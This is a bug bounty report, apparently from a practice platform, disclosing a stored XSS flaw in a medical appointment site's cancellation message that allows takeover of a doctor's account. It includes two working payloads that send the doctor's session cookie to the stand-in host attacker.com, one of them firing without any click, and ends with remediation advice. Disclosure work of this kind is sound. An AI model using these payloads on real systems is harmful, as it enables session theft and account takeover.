BugBountyHunter

Description

Hello Sean,

When users cancel their appointments they can leave a message for the doctor. Proper sanitization is not implemented in place which makes Stored XSS possible on this endpoint. This vulnerability leads to a one-click account takeover.

Steps To Reproduce

1. Make an appointment on the /book-appointment.html endpoint:

After doing so you will be given an appointment ID:

2. Use your appointment ID on the /yourappointments.php API endpoint to manage your appointment:

3. Intercept the request to Cancel Appointment and do the following changes before sending the final HTTP request:

• Add the following payload as the value of the message parameter and forward the request:

"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='http://attacker.com?cookie='%2bdocument.cookie">

4. Visit the /drpanel/cancelled.php endpoint using the doctor's accounts. If you click on the user's cancellation message, the XSS executes:

• The drps cookie of the doctor will be sent to the attacker's server, which leads to the complete account takeover:

No User-Interaction Payload

The previous payload needs a click to execute. However, it is possible to craft a payload that needs no user interaction but doesn't work on Firefox:

"><xss/id="1"/tabindex="1"/style="font-size:%2010px"/autofocus/onfocusin="window.location.href='http://attacker.com?cookie='%2bdocument.cookie">

The above payload results in a no user-interaction XSS after the doctor visits the /drpanel/cancelled.php endpoint. The drps cookies will be sent to the attacker's controlled server which results in a complete account takeover.

Impact

• XSS leading to one-click account takeover.

Remediation

• Implement proper sanitization on the message parameter.
• Set httponly cookies so that javascript can not access the cookies.
• Remove/Expire the drps cookies after logging out.

Best Regards,

HolyBugx